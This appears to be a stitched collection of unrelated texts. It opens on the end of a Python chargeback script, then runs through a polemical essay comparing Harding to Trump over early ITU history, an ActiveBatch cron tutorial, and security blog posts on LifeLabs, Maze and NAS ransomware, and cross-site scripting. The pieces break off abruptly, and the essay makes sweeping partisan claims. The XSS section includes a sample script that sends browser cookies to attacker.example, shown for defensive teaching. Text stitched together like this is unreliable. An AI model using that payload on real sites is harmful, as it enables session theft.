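if __name__ == "__main__":
    for units in (500, 5000, 25000):
        print(f"{units:>6} units -> ${chargeback(units):,.2f}")
```

Splitting the fixed fee from the metered portion mirrors the point above that shared infrastructure combines fixed and variable costs, with the fixed share shrinking as usage grows.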
The International Telecommunication Union recently began a well-deserved celebration of one of the real success stories in international cooperation—the 110th anniversary of the Radio Regulations as a treaty instrument. An ITU publication describes the historical highlights. Global cooperation among governments in managing radio spectrum via the Radio Regulations has been generally regarded as essential from the outset in the early years of the 20th Century and remains so today. Over the decades, the work has been almost universally supported and constitutes the largest of the ITU activities among governments and industry. A part of that history that is almost unknown, however, is how Warren G. Harding’s election as President almost a hundred years ago killed off the ongoing efforts to establish the ITU as a means of international multilateral cooperation—together with the Radio Regulations. Harding is widely regarded as perhaps the worst U.S. president in its history, and his term of office was marked by crony capitalism scandals and disastrous decisions on multiple levels. Today there are many eerie parallels to the election of Donald Trump as he strives to exceed Harding’s notorious status as the worst. The interesting question over the coming months is whether Harding’s mistakes in international telecommunication history will be repeated by Trump. Woodrow Wilson’s international telecommunication cooperation vision Wilson’s effort to create the League of Nations is well known and there are memorials all over Geneva to that vision. Almost unknown was an independent initiative to bring about a visionary “Universal Electrical Communications Union” and foster global communications “for the entire world” which occurred at about the same time and has remained essentially invisible. One hundred years ago, there was no actual ITU—only a relatively static Telegraph treaty that included telephony, an outdated Radiotelegraph treaty, and a small secretariat in Bern that separately attended to both sets of signatories and their occasional plenipotentiary meetings. There were enormous developments in telecommunication technology during World War One—especially relating to radio. A group of visionaries in the Wilson administration and a few foreign counterparts pursued a new effort starting with the EU[États-Unis]-F-GB-I Radiotelegraphic Commission in Paris meeting on a warm summer day in August 1919 to produce the basis for new Radio Regulations. The success of the cooperation led Wilson a few weeks later to request the U.S. Congress approve hosting a major international conference in Washington: to consider all international aspects of communication by land telegraphs, cables, and wireless telegraphy and to make recommendations to the powers concerned with a view to providing the entire world with adequate facilities of this nature on a fair and equitable basis. It is at this point that the visionary leader for the effort in the Wilson Administration emerges in the person of Walter S. Rogers—a senior official in his State Department. Rogers also was the special advisor to the Peace Conference at Paris among 27 nations in January 1919 on matters relating to international communication. The Conference was largely controlled by U.S., Britain, France, Italy, and Japan which produced many agreements including the creation of the League of Nations. 
What was effectively the first Plenipotentiary Conference of the Electrical Communications Union met in Washington DC in December 1920—preceded by a smaller sub-committee meeting in September to further consider the 1919 draft Radio Regulation provisions. After considerable work over many weeks, it produced a draft Convention for the creation of a Universal Electrical Communications Union with Telegraph and Radio Regulations. One of the entities created was an International Technical Radiotelegraph and Visual Committee (CIRV) charged with “giving advice on all problems concerning radiotelegraphy and visual and sound signaling.” It was a fascinating period of cooperation and innovation that led to a draft Convention that integrated the separate radio and telecommunication regimes and produced fully developed Radio Regulations. Harding replaces Wilson and kills all international cooperation An admitted know-nothing Republican candidate - Warren G. Harding—by chance was nominated in 1920 and elected President on the slogan “A Return to Normalcy.” Much like what is occurring now in the U.S., one of America’s most visionary Presidents - Wilson - was replaced by an ignorant, incompetent man who saw his role as the modern day equivalent of a reality show and admitted he knew nothing about the subject matter. Harding brought with him crazies intent on overturning everything Wilson had been doing, destroying the environment, introducing ultra-free market policies, and ceasing international cooperation. To run the government, he surrounded himself with dishonest cheats, who came to be known as “the Ohio gang.” Many of them were later charged with defrauding the government, and some of them went to jail. Harding knew little about foreign affairs when he assumed office and gave his Secretary of State a free hand to secure foreign markets for wealthy contributors to his campaign. Harding took office 4 March 1921. Eleven weeks later at the Commodore Hotel in New York City, one of the more notorious meetings in international telecommunications history unfolded where Walter S. Rogers was grilled for two days by friends of the new Harding Administration on the efforts to create a new International Communications Union organization and Radio Regulations. Still, at the State Department, he was essentially made to repent for his visionary efforts, and it was made plain that all international cooperation efforts would cease. If not for a 311-page transcript of the meeting that Rogers tucked away in the U.S. archives marked “confidential,” no one would have known what occurred. Although Harding was never linked to any crooked deals, the public was aware of his affairs with at least two women, one of whom was a German sympathizer during the war- who tried to blackmail Harding and was paid hush money by the Republican Party. Another mistress 30 years younger than Harding was given a job that enabled liaisons in the Oval Office that resulted in his fathering her child. As scandals unfolded, and Harding’s appointees began going to jail, he succumbed to a heart attack at 57 after being in office only 2 ½ years. It would not stop there, as the economic policies that Harding set in motion ultimately gave rise to the Great Depression, destruction of the environment, and internationally facilitated the Third Reich and Adolf Hitler. Walter S. Rogers’ subsequent history is unknown. 
After the Commodore Hotel incident and having his vision belittled, he wrote a sage albeit a poignant set of reflections published in Foreign Affairs. His admonition seems as appropriate today as it was in 1922: To what extent, under the circumstances, the American Government should participate in general international communications conferences is a question that concerns not only the United States but the other countries as well. Without taking a new tack the United States certainly can not participate in limited international arrangements looking toward the joint provision, by the countries immediately concerned, of new facilities or the joint regulation of rates of services provided by commercial enterprises. Though it is not apparent that Rogers ever participated in an international communications meeting again, the value of his work and his vision as Wilson’s emissary was blessed by history. After a long, dark hiatus of U.S. international telecommunications cooperation, Herbert Hoover as U.S. Commerce Secretary found the work on the Radio Regulations compelling. He called the 1927 Radio Conference in Washington using the work done six years earlier as its basis and it produced the Radio Regulations and Consultative Committee activities that still exist today. The work on the Convention for an integrated cooperative international organization was picked up in 1932 at the Madrid Conference and became the basis for the International Telecommunication Union coming into existence in 1934 and its treaty instruments enduring as the basis for cooperation among all nations. Although Trump’s pronouncements on international telecommunication cooperation remain unknown, the views and approaches espoused thus far give cause for great concern. China has already in recent years assumed a level of visionary global leadership and engagement in telecommunications venues once enjoyed by the U.S. Bully bilateralism as a replacement for international cooperation in the sector is also doomed to fail. Perhaps the ultimate message here from a hundred years ago is that stable means of global cooperation and vision on matters of fundamental importance for all people have compelling value and will ultimately prevail over the jingoism, self-serving incompetence, and demagoguery of transient national political figures.
Linux is a free, open source operating system known and loved by technical teams across the globe. This OS is extremely popular with developers of all experience levels and startup teams because it can be customized more than other operating systems and offers flexible setup depending on a team's environment variables. Something teams of all sizes use Linux for is scheduling jobs and automating tasks. The most popular method for scheduling jobs in Linux is cron jobs.

What is cron?

Cron is a system process that automatically performs tasks based on a specific schedule. Getting its name from the Greek word "Chronos," meaning time, cron refers to a set of commands used to run regular scheduled tasks. Cron is a job scheduling utility that exists in Unix-like systems. The cron daemon runs in the background to enable cron job scheduling functionality. There are per-user cron files (managed with the crontab command), system drop-in files under /etc/cron.d/, and the system-wide /etc/crontab file. Every user manages their own scheduled jobs and cron configuration file. The cron daemon itself runs as a system service, whose status could look something like this:

$ sudo systemctl status crond
● crond.service - Command Scheduler
Loaded: loaded (/usr/lib/systemd/system/crond.service; enabled; vendor preset: enabled)
Active: active (running) since Fri 2022-11-11 15:13:12 -03; 1h 17min ago

The above example is referenced from a Red Hat system administrator article.

What is crontab?

Cron reads the crontab to run predefined scripts. Crontab means "cron table" and uses the cron job scheduler to execute tasks. Crontab is also the name of the program that is used to edit the schedule of tasks. This program is driven by a crontab file, or configuration files, that directs shell commands to run on a specific time schedule. Using specific syntax allows users to configure a cron job to schedule scripts or other commands to run automatically. When writing out a crontab entry, use an asterisk to match any value, use hyphens to define a range (such as 1-10 or apr-jun), and use commas to separate multiple values or ranges.

What are cron jobs?

Any action that you schedule through cron is called a cron job. Cron jobs automate routine tasks to run at a scheduled time, and can be set to run by minute, hour, day of the month, month of the year, or day of the week.

Linux Job Scheduling with Cron

Using cron jobs in Linux has numerous benefits. This method enables teams to use the Linux operating system to schedule a backup of log files, delete old log files, archive and purge database tables, send email notifications, clear cached data, and automate Unix jobs and system maintenance. Linux systems already ship with the crontab task scheduler, which can run automated processes with root user permissions, making changes easier for a system administrator.

Cron Job Syntax for Linux Task Scheduling

To modify scheduled cron jobs, edit the crontab file or create files inside the cron directories using the necessary parameters. Crontabs use the following commands for adding and listing cron jobs on the command line:

- crontab -e: Edits crontab entries to add, delete, or modify cron jobs.
- crontab -l: Lists all cron jobs for the current user.
- crontab -u username -l: Lists another user's crontab.
- crontab -u username -e: Edits another user's cron jobs.

When listing crons, users will see a series of asterisks, like the example below:

* * * * * sh /path/to/script.sh

Each asterisk represents minutes, hours, days, months, or weekdays.
sh indicates that the script is a shell (bash) script, and /path/to/script.sh specifies the path to the script.

Examples of Using Crontab to Schedule Tasks in Linux

Some examples of scheduling cron jobs in Linux include:

0 8 * 8 * will schedule a task for 08:00 every day in August.
8 5 * * 6 will schedule a task for 05:08 every Saturday.
0 12 * * 1-5 will schedule a task every weekday (Monday through Friday) at 12:00.

Linux Job Scheduling with ActiveBatch

ActiveBatch is a workload automation and job scheduling tool that helps teams automate cross-platform IT and business processes. The Linux job scheduler features day and time scheduling options for scheduling tasks at specific times, including day of the week and day of the month. An integrated cron jobs library sets ActiveBatch's Linux job scheduling solution apart, providing hundreds of pre-built job actions. Teams can use ActiveBatch to easily schedule tasks and cron jobs without needing a tutorial or managing complex configurations. With numerous extensions for popular web apps, teams can build and automate complex task scheduling workflows from a central system. ActiveBatch also makes it easy to connect to applications with API endpoints and perform command line functions. ActiveBatch's Linux job scheduler enables teams to schedule tasks on the operating system of their choice, including Windows, Linux, UNIX, and IBM iSeries AS/400, and to integrate with other job schedulers, including cron jobs, for added convenience. Cron job automation provides functionality like delivering notifications, writing to the event log file, and more. Teams can use default load balancing functionality to reduce wait times and manage the provisioning of infrastructure resources.

Frequently Asked Questions

Cron is a time-based job scheduler in Unix-like operating systems, which allows you to run Linux commands or scripts at a specific time or interval. To schedule a daily job in Linux using cron, take the following steps:

1. Type the following command into your terminal to open the crontab configuration file: crontab -e. This will open the crontab file in your default text editor.
2. In your text editor, add a new line for your job with the following syntax: * * * * * /path/to/command. This syntax represents the following time parameters in order: minute, hour, day of the month, month, and day of the week. The asterisk (*) character means "any" value, so this example will run the command every minute of every hour, every day of the month, every month, and every day of the week. For a daily job, set the minute and hour fields, for example 0 6 * * * to run at 6:00 every day.
3. Replace /path/to/command with the command or script you want to run.
4. Save and close the crontab (Ctrl + X in nano) to confirm the changes.

Learn more about using cron job software for workflow automation using ActiveBatch.

While cron is typically already installed by default on most Linux machines, users can install cron through the following steps:

1. Open your preferred terminal window.
2. Update your package listing using the following command: sudo apt-get update. This command is for Ubuntu or Debian based distributions. If you're using a different distribution, you may need to use a different command or package manager.
3. Install cron using the following command: sudo apt-get install cron. This command will install the cron package and any dependencies.
4. Once installation is complete, you can verify cron has been installed by running the following command: sudo systemctl status cron

ActiveBatch's workload automation tool offers dozens of tools to maintain and integrates shell scripts of any language.
"* * * * *" is a cron expression that defines a specific time for running a cron job. In a cron expression, there are five fields separated by spaces, each representing a unit of time. The five fields represent, in order:

1. Minute (0-59)
2. Hour (0-23)
3. Day of the month (1-31)
4. Month of the year (1-12 or Jan-Dec)
5. Day of the week (0-7 or Sun-Sat)

The "*" character in each field means "any value", so the expression "* * * * *" means "run the cron job every minute, every hour, every day of the month, every month of the year, and every day of the week". Replace any or all of the asterisk characters with specific values to define a more precise schedule. For example, "0 4 * * *" means "run the cron job at 4:00 AM every day", while "0 0 1 * *" means "run the cron job at midnight on the first day of every month."

Automate and orchestrate diverse system processes using ActiveBatch's cross-platform job scheduling software.

Linux has a built-in scheduler called the Completely Fair Scheduler (CFS), which is responsible for managing and distributing CPU time among processes. The CFS is a process scheduler that provides fairness, low latency, and scalability to the Linux kernel. See how batch task scheduling with ActiveBatch can help you manage critical business and IT jobs.

There are a number of Linux tools that can be used to schedule tasks. These include:

- Cron: Cron is a time-based scheduler in Linux that allows users to schedule tasks (commands or scripts) to run at specific intervals. Cron can be used to schedule tasks by day of week, day of month, or month of year, for weekly, monthly, or annual execution.
- At: At can be used to schedule one-time jobs to run at a specific time in Linux. Unlike cron, at is designed to run a job only once, at a specific time and date.
- systemd timers: Systemd is a system and service manager for the Linux operating system. Systemd timers provide a way to schedule tasks to run at a specific time, after a certain delay, or on a recurring schedule.
- Anacron: Anacron is used to run jobs that should be executed regularly, but not necessarily at a specific time. Anacron is designed to handle jobs that would otherwise be missed because of system downtime or reboots.

The at command is considered one of the most useful for scheduling one-time jobs in Linux. The at package installs other binaries that are used in tandem with the main command. The package provides the atd daemon, which is what users will interact with using the at and atq commands. Compare Linux job scheduling with Windows job scheduling using ActiveBatch solutions.
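As a small, self-contained illustration of the five-field syntax covered above, the following sketch parses a cron expression and checks whether a given time matches it. It is a deliberately simplified matcher, not cron's actual implementation: it supports only plain values, "*", ranges, and comma lists, and it ignores step values, name aliases, and cron's special day-of-month/day-of-week OR rule.

```python
# Minimal cron-expression matcher: minute hour day-of-month month day-of-week.
# Supports "*", single values, ranges ("1-5"), and comma lists ("1,15,30").
from datetime import datetime

FIELD_RANGES = [(0, 59), (0, 23), (1, 31), (1, 12), (0, 7)]  # 0 and 7 both mean Sunday

def parse_field(field: str, lo: int, hi: int) -> set:
    values = set()
    for part in field.split(","):
        if part == "*":
            return set(range(lo, hi + 1))
        if "-" in part:
            start, end = (int(p) for p in part.split("-"))
        else:
            start = end = int(part)
        if not (lo <= start <= end <= hi):
            raise ValueError(f"value out of range in field {field!r}")
        values.update(range(start, end + 1))
    return values

def matches(expr: str, when: datetime) -> bool:
    fields = expr.split()
    if len(fields) != 5:
        raise ValueError("a cron expression has exactly five fields")
    minute, hour, dom, month, dow = (
        parse_field(f, lo, hi) for f, (lo, hi) in zip(fields, FIELD_RANGES))
    weekday = (when.weekday() + 1) % 7        # convert Mon=0..Sun=6 to Sun=0..Sat=6
    return (when.minute in minute and when.hour in hour and when.day in dom
            and when.month in month and (weekday in dow or (weekday == 0 and 7 in dow)))

if __name__ == "__main__":
    print(matches("0 12 * * 1-5", datetime(2024, 9, 9, 12, 0)))   # Monday noon -> True
    print(matches("0 8 * 8 *",    datetime(2024, 9, 9, 8, 0)))    # September  -> False
```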
Valuable Lessons from Recent Cyber Extortions

The recent data breach at LifeLabs, which affected nearly half of Canada's population, and the recent data breach at the City of Pensacola highlight the growing danger of cyber extortion.

What Is Cyber Extortion?

Extortion, the act of using threats to gain something from someone, has been given a new form in the cyber world. In the case of the data breach at LifeLabs, cybercriminals gained access to the company's computer systems, stole data and thereafter demanded ransom payment from the company in exchange for the stolen data. In a joint statement, the Office of the Information and Privacy Commissioner of Ontario and the Office of the Information and Privacy Commissioner for British Columbia said, "LifeLabs advised our offices that cyber criminals penetrated the company's systems, extracting data and demanding a ransom." "Retrieving the data by making a payment," said Charles Brown, President and CEO of LifeLabs, was one of the several measures taken by the company to protect customer information.

The recent cyber extortion at the City of Pensacola, meanwhile, involved a headline-grabbing method: ransomware, malicious software (malware) that encrypts computer files, locks out users and demands ransom payment from victims in exchange for the decryption keys that would unlock the encrypted files. The group behind the ransomware called "Maze" claimed responsibility for the ransomware attack on the City of Pensacola. The group demanded that the City pay $1 million in ransom to decrypt the encrypted files. Ten percent, or 2 GB, of the data stolen before the City's computer files were encrypted was recently published online by the group behind Maze ransomware. When asked by BleepingComputer whether the group intends to release the rest of the stolen data, the group said, "It depends". The group behind Maze ransomware similarly published online 10%, or 700 MB, of data stolen from another victim, Allied Universal, after the victim failed to pay the group's demand of 300 bitcoins, then valued at nearly $2.3 million. The group told BleepingComputer that the rest of the stolen data will be leaked online if the increased ransom of $3.8 million is not paid.
Cobalt Strike uses well-known tools, including Mimikatz – a tool that’s capable of obtaining plaintext Windows account logins and passwords. According to Cisco Talos researchers, once the adversary behind Maze ransomware has access to the victim’s network, at least a week is spent moving around the network and gathering data along the way. The researchers added that the gathered data is extracted by using “PowerShell to dump large amounts of data via FTP out of the network”. After data extraction, Maze ransomware is then deployed on the compromised computers, the researchers at Cisco Talos said. The researchers at Cisco Talos added that the observed Maze ransomware attacks also involved interactive logins via Windows Remote Desktop Protocol and remote PowerShell execution achieved via Windows Management Instrumentation Command-Line (WMIC). In its 2020 Threats Predictions Report, McAfee Labs said that for 2020, it predicts that targeted penetration of corporate networks will continue to grow and ultimately give way to two-stage extortion attacks, with the first stage of attack involving a crippling ransomware attack and the second stage of attack involving the threat to disclose the data stolen before the ransomware attack. Preventive and Mitigating Measures Against Cyber ExtortionWhile having a working backup system is still a must to protect your organization’s sensitive data, as shown in the recent cyber extortions, brushing off cyber-attacks through better backup systems will prove to be not enough in 2020 as attackers are aiming for data theft and leveraging this stolen data to get what they want. Here are some of the preventive and mitigating measures against cyber extortion: - Keep All Software Up to Date Keeping all your organization’s software up to date stops attackers at their tracks as the latest software security updates typically fix security vulnerabilities. - Apply the Principle of Least Privilege The principle of least privilege promotes minimal user privileges on computers based on user’s job necessities. For instance, if the user’s work isn’t IT-related, his or her computer access shouldn’t allow administrative rights, referring to the right to install software, change the operating systems configuration settings and other higher-level access. - Disable Windows Remote Desktop Protocol (RDP) There have been many document cases whereby Windows Remote Desktop Protocol (RDP) had been used by attackers as a gateway to their victims’ networks. It’s advisable to disable RDP when this service isn’t used. - Keep Backups Offline Over the past few months, attackers have specifically targeted backup systems. It’s advisable to keep your organization’s backup systems offline. Cyber extortions has become a new norm and many organizations have already fell victim. Connect with our team of cybersecurity experts today to understand you weakest links better and mitigate the risk of cyber extortion. LifeLabs Reveals It Paid Ransom in Exchange for Stolen DataLifeLabs, the largest provider of general diagnostic and specialty laboratory testing services in Canada, has announced that it paid an undisclosed amount of ransom in exchange for the stolen data of 15 million customers. Charles Brown, President and CEO of LifeLabs, in a statement, said that the company’s computer systems were illegally accessed resulting in the theft of data belonging to approximately 15 million customers. Stolen data includes name, address, email, login, passwords, date of birth and health card number. 
The vast majority of the affected customers are from Ontario and British Columbia. Brown added that laboratory test results of 85,000 customers from Ontario for the period 2016 or earlier were part of the stolen data. The President and CEO of LifeLabs further said that health card information of customers for the period of 2016 or earlier was also stolen. "Retrieving the data by making a payment,” Brown said was one of the measures that the company took in order to protect customer information. “Personally, I want to say I am sorry that this happened,” he said. While the President and CEO of LifeLabs said that risk to customers in connection with this cyber attack is “low and that they have not seen any public disclosure of customer data,” he called on affected customers to avail of the company’s one free year of protection that includes dark web monitoring and identity theft insurance. How the LifeLabs Data Breach Unfolded?The President and CEO of LifeLabs said that the data breach was discovered as a result of "proactive surveillance” and added that the company “fixed the system issues” related to the cyber-attack. In a joint statement, the Office of the Information and Privacy Commissioner of Ontario (IPC) and the Office of the Information and Privacy Commissioner for British Columbia (OIPC) said that LifeLabsinformed the two offices on November 1, 2019 about the data breach. The IPC and OIPC said that they will conduct a joint investigation into the data breach at LifeLabs. Among the things to be investigated, the two offices said, will include the scope of the breach and the circumstances leading to it. “They advised us that cyber criminals penetrated the company's systems, extracting data and demanding a ransom,” IPC and OIPC said in a joint statement. “LifeLabs paid the ransom to secure the data.” "An attack of this scale is extremely troubling,” said Brian Beamish, Information and Privacy Commissioner of Ontario. “I know it will be very distressing to those who may have been affected. This should serve as a reminder to all institutions, large and small, to be vigilant." “I am deeply concerned about this matter,” said Michael McEvoy, Information, and Privacy Commissioner for British Columbia. “The breach of sensitive personal health information can be devastating to those who are affected." While ransom or payment was made, there was no mention that the attack was due to a ransomware – a type of malicious software (malware) that encrypts data and the group or individual behind the malware then demands ransom payment in exchange for decryption key or keys that would unlock the encrypted files. Cyber Attackers New Modus OperandiWhile cyber attackers have been known to steal data from their victims, there’s a scarcity of information showing victims paying ransom in order to get back the stolen data. The latest cyber incident at LifeLabs shows an alarming cyber-attack trend, that is, penetrating the victim's systems, extracting data and then demanding a ransom. Ransomware attackers, meanwhile, over the past few weeks have openly employed a new tactic in order to force their victims to pay ransom: threatening ransomware victims that failure to pay the ransom will result in the publication of stolen data. This latest modus operandi by ransomware attackers confirms what has been widely known in the cyber security community that ransomware attackers don’t merely encrypt data but they also have ways to snoop and even steal data prior to the data encryption. 
In late November of this year, the group behind the ransomware called "Maze" published online the stolen data of one of its victims, Allied Universal, after Allied failed to pay 300 bitcoins, then valued at nearly US$2.3 million, within the period set by the malicious group. The group behind the Maze ransomware told BleepingComputer, "We gave them time to think until this day, but it seems they [Allied Universal] abandoned payment process." The group further said that before encrypting any of the victims' files, these files are first exfiltrated, or stolen, to serve as further leverage for the victims to pay the ransom. The group behind the ransomware called "REvil", also known as Sodinokibi ransomware, recently announced in a hacker forum that it will also leak online the stolen data of ransomware victims who refuse to pay. Other than leaking the stolen data online, the group behind REvil also said the stolen data of victims who refuse to pay could be sold. Maze ransomware initially infects victims' computers via phishing campaigns or via the Fallout exploit kit – a hacking tool that exploits security vulnerabilities in Adobe Flash Player and Microsoft Windows. REvil ransomware, meanwhile, also initially infects victims' computers via phishing campaigns and exploit kits, as well as by exploiting a security vulnerability in Oracle's WebLogic server and by brute-forcing Remote Desktop Protocol (RDP) access.

Ransomware Attacks Now Targeting Your Backups

Backups have traditionally been regarded as the last line of defence against ransomware attacks. Over the past few months, however, backups have been specifically targeted by ransomware attacks. In the "IT threat evolution Q3 2019" report, Kaspersky researchers found that ransomware attacks on backups, specifically NAS backups, are gaining ground.

What Is NAS?

NAS, short for network attached storage, is a storage and backup system that consists of one or more hard drives. This storage and backup system can be connected to a home or office network or to the internet. When a NAS device is connected to the internet, the data stored on it can be accessed using a web browser or a mobile app.

Ransomware Targeting NAS

Researchers at Anomali in July of this year reported on eCh0raix, a ransomware that specifically targets QNAP network attached storage (NAS) devices. According to the researchers, the source code of eCh0raix has fewer than 400 lines, with functionality typical of ransomware, including checking whether data on the infected system has already been encrypted, going through the file system for files to encrypt, encrypting the files, and producing the ransom note. The Anomali researchers noted that eCh0raix isn't designed for mass distribution, as the samples with a hardcoded public key appear to be compiled for a specific target, with a unique key for each target. QNAP Systems, the manufacturer of QNAP NAS devices, for its part, acknowledged that QNAP devices using weak passwords and outdated QTS firmware are vulnerable to eCh0raix ransomware. In July of this year, another NAS device manufacturer, Synology, reported that several Synology NAS devices were under ransomware attack as a result of brute-forcing of administrator login details. In a brute-force attack, a malicious actor submits a number of passwords in the hope of eventually guessing the correct one.
According to Synology, its investigation into the ransomware attacks found that they were the result of dictionary attacks – brute-forcing login details using words from a dictionary – rather than specific system vulnerabilities. Synology added that the large-scale ransomware attacks targeted various NAS models from different NAS vendors. Ken Lee, Manager of the Security Incident Response Team at Synology, said that the NAS attackers used "botnet addresses to hide their real source IP". Just last month, another NAS device manufacturer, D-Link, acknowledged that the following D-Link network attached storage (NAS) models are vulnerable to a different ransomware called "Cr1ptT0r": DNS-320 Ax/Bx, DNS-325, DNS-320L, DNS-327L, DNS-323 Ax/Bx/Cx, DNS-345, DNS-343 and DNS-340L. According to D-Link, Cr1ptT0r encrypts stored information and then demands payment to decrypt it. According to Kaspersky researchers, the growing number of ransomware attacks on NAS devices involves attackers scanning the internet for internet-connected NAS devices. Kaspersky researchers said that a number of NAS devices have vulnerabilities in their firmware, which enable attackers, via an exploit, to install on the compromised device a Trojan – a type of malicious software (malware) that's often disguised as legitimate software – that encrypts all data on the NAS device. "This is a particularly dangerous attack, since in many cases the NAS is used to store backups, and such devices are generally perceived by their owners as a reliable means of storage, and the mere possibility of an infection can come as a shock," Kaspersky researchers said.

Preventive and Mitigating Measures

Here are some of the preventive and mitigating measures against ransomware attacks targeting NAS backups. Manufacturers of NAS devices – QNAP Systems, Synology and D-Link – have asked users to apply the latest software or firmware version. In the case of D-Link NAS devices, D-Link said that the DNS-320 Ax/Bx, DNS-323 Ax/Bx, DNS-325 Ax and DNS-345 Ax have passed their end-of-service date, which means these models are no longer supported by the company through customer support and no longer receive software or firmware updates. For the models that have passed their end-of-service date, D-Link asked users to "remove the Internet access of NAS on your router by disabling the port forwarding and DMZ setting". One thing is common to these NAS ransomware attacks: they victimized only devices that are connected to the internet. To protect backups from this type of ransomware, it's important to disable internet access to these devices. Generally, an internet-connected NAS device can only be accessed via a web or mobile app interface, and this interface is protected by an authentication page where a user has to authenticate before logging in. As acknowledged by the NAS manufacturers, some users use weak passwords, making it easy for attackers to brute-force or guess them. When these NAS devices do need to be accessible via the internet, it's important to use strong passwords and, if possible, multi-factor authentication to add another layer of defence. Additional defences can further reduce the exposure of backups to ransomware attacks. As the number of ransomware attacks in recent months shows, this type of cyber-attack doesn't seem to be slowing down.
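As a quick, hands-on complement to the advice above, the sketch below (Python, standard library only) checks whether typical NAS management ports answer at a given address. The host is a placeholder and the port numbers are common vendor defaults (Synology DSM on 5000/5001, QNAP web UI on 8080); they may differ on your devices, so treat this as an illustrative starting point rather than a definitive audit. Run it from outside your own network (for example, from a cloud VM or over a phone hotspot) against your public IP to see what is actually exposed.

```python
# Sketch: check whether a NAS management interface answers on common web/admin ports.
# The host below is a placeholder (TEST-NET-3); replace it with your own public address.
import socket

HOST = "203.0.113.10"
PORTS = {
    80: "HTTP admin UI",
    443: "HTTPS admin UI",
    5000: "Synology DSM (HTTP, default)",
    5001: "Synology DSM (HTTPS, default)",
    8080: "QNAP web UI (HTTP, default)",
}

def is_open(host: str, port: int, timeout: float = 3.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

for port, label in PORTS.items():
    state = "REACHABLE" if is_open(HOST, port) else "closed/filtered"
    print(f"{port:>5} ({label}): {state}")
```

If any of these ports come back as reachable and you do not deliberately publish the NAS to the internet, disabling the corresponding port forwarding or DMZ rule on the router is the first thing to check.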
Organizations that have shown themselves financially capable of paying ransom – including government agencies and organizations in the healthcare and education sectors – are particular targets of this attack. You don't have to be a victim of a ransomware attack. Stop cybercriminals before they get the leverage. Speak with our cybersecurity experts today and stop worrying about ransomware.

Cross-Site Scripting: Still One of the Biggest Cyber Threats

Cross-site scripting, also known as XSS, is one of the most dangerous software errors and threatens websites and applications, even the likes of Gmail. Security researcher Michał Bentkowski of Securitum recently discovered a cross-site scripting vulnerability in Gmail's AMP4Email, also known as "dynamic email". Launched in July 2019, Gmail's dynamic email allows users to take action directly from within a message, such as RSVPing to an event, filling out a questionnaire or browsing a catalog. In allowing dynamic content in Gmail, Google knows it opens itself to security vulnerabilities such as cross-site scripting – a vulnerability that allows malicious actors to add malicious code to trusted websites or applications. While Google takes a number of precautions against cross-site scripting, Bentkowski discovered that Gmail's dynamic email didn't block the HTML id attribute, leaving the email service vulnerable to cross-site scripting. Bentkowski said he reported the vulnerability to Google on August 15, 2019. According to Bentkowski, Google replied that "the bug is awesome, thanks for reporting". He added that on October 12, 2019, he received confirmation from Google that the bug had been fixed.

What Is Cross-Site Scripting?

Cross-site scripting is so widespread that it's ranked second in the 2019 Common Weakness Enumeration (CWE) Top 25 Most Dangerous Software Errors. According to CWE, which is sponsored by the U.S. Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA), the ranking of the most dangerous software errors is based on Common Vulnerabilities and Exposures (CVE) data and data from the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD). The NVD data, in particular, covered the years 2017 and 2018 and consisted of nearly 25,000 CVEs. Based on the NVD count, 3,430 of those CVEs were cross-site scripting vulnerabilities. Cross-site scripting is a security vulnerability found in web pages or applications that accept user input. This includes login pages, check-out pages and, in the case of Gmail, its AMP4Email or dynamic email. While users typically enter legitimate input – usernames and passwords on login pages, credit card details on check-out pages, or an RSVP to an event in Gmail's dynamic email – fields that accept user input can be exploited by malicious actors, giving them the opportunity to insert malicious code into an otherwise trusted website or application. In the case of Gmail's dynamic email, there's no report that malicious actors were able to exploit the said cross-site scripting vulnerability. Security engineers at Microsoft were the first to coin the term cross-site scripting, back in December 1999.
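To make the mechanics concrete, here is a minimal, generic Python sketch of the core defence against this class of flaw: encoding untrusted input before it is placed into HTML output. It is an illustration only, not code from Gmail or from the research described above; real applications usually rely on an auto-escaping template engine rather than manual escaping.

```python
# Sketch: the same user-supplied string rendered unsafely and safely.
from html import escape

def render_comment_unsafe(user_input: str) -> str:
    # Vulnerable: user input is concatenated straight into the page, so <script>
    # tags (or event-handler attributes) will run in the victim's browser.
    return f"<p>{user_input}</p>"

def render_comment_safe(user_input: str) -> str:
    # Encoded: <, >, &, and quote characters become harmless HTML entities.
    return f"<p>{escape(user_input, quote=True)}</p>"

payload = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
print(render_comment_unsafe(payload))  # would execute if sent to a browser
print(render_comment_safe(payload))    # rendered as inert text
```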
Returning to the history of the term: in December 2009, in commemorating the 10th anniversary of its coining, security engineers at Microsoft wrote in the blog post "Happy 10th birthday Cross-Site Scripting!", "Let's hope that ten years from now we'll be celebrating the death, not the birth, of Cross-Site Scripting!" As the latest ranking of the most dangerous software errors shows, cross-site scripting appears to be far from dead. Microsoft itself recently patched a cross-site scripting vulnerability in its Microsoft Outlook for Android software. The company said that the vulnerability allows an attacker to "run scripts in the security context of the current user".

Magecart

Cross-site scripting has recently been put back into the headlines by Magecart – the umbrella term for cybercriminal groups that steal credit card details from unsecured payment forms on websites. Magecart has been linked to the data breach at British Airways and the recent data breach at Macy's. Researchers at RiskIQ reported that Magecart breached the British Airways baggage claim information page by inserting just 22 lines of code, enabling the attackers to grab personal and financial details entered by customers and send the stolen data to a server controlled by the attackers. A security researcher who wishes to remain anonymous, meanwhile, told BleepingComputer that the recent data breach at Macy's website was caused by the alteration of the https://www[dot]macys[dot]com/js/min/common/util/ClientSideErrorLog[dot]js script, enabling the attackers to grab data entered by customers on the company's website, in particular on the checkout page and wallet page.

Preventive and Mitigating Measures Against Cross-Site Scripting

